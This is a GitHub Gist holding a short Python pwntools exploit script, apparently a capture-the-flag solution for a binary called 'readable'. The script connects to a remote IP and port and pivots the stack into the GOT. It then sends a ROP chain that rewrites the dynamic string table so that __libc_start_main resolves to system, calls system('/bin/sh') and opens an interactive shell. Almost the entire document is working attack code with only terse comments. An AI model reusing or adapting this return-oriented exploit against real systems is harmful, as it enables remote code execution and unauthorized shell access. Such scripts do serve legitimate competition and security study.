Created
October 19, 2015 07:48
-
-
Save salls/b74aa61f17e0b66cbb00 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #r = process("./readable") | |
| r = remote("52.68.53.28", 56746) | |
| # pivot the stack to the GOT to overwrite target of __libc_start_main, then call start | |
| payload1 = "A"*0x10 + p64(0x600900) + p64(0x400505) | |
| r.send(payload1) | |
| raw_input("> ") | |
| payload2 = p64(0x400511) + "A"*8 + p64(0x600900) + p64(0x400416) | |
| r.send(payload2) | |
| # leakless | |
| # dynstr at 0x600780 | |
| # point it at 0x600a60 | |
| chain = "" | |
| # read to 0x600780 | |
| chain += p64(0x400456)*30 | |
| chain += p64(0x400591) | |
| chain += p64(0x600780) | |
| chain += p64(0x0) | |
| chain += p64(0x4003E0) | |
| # read to 0x6008f0 | |
| chain += p64(0x400591) | |
| chain += p64(0x6008F0) | |
| chain += p64(0x0) | |
| chain += p64(0x4003E0) | |
| # call libcstart (system) with /bin/sh | |
| chain += p64(0x400593) | |
| chain += p64(0x600a38) | |
| chain += p64(0x4003F0) | |
| chain += "/bin/sh\x00" | |
| chain += "A"*8*6 | |
| chain += "system\x00" + "A"*300 | |
| r.send(chain + "\n") | |
| time.sleep(0.3) | |
| # send what I'm writing to dynstr | |
| r.send(p64(0x600a60)) | |
| time.sleep(0.3) | |
| # send what I'm writing to libcstart | |
| r.send(p64(0x4003F6)) | |
| r.interactive() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment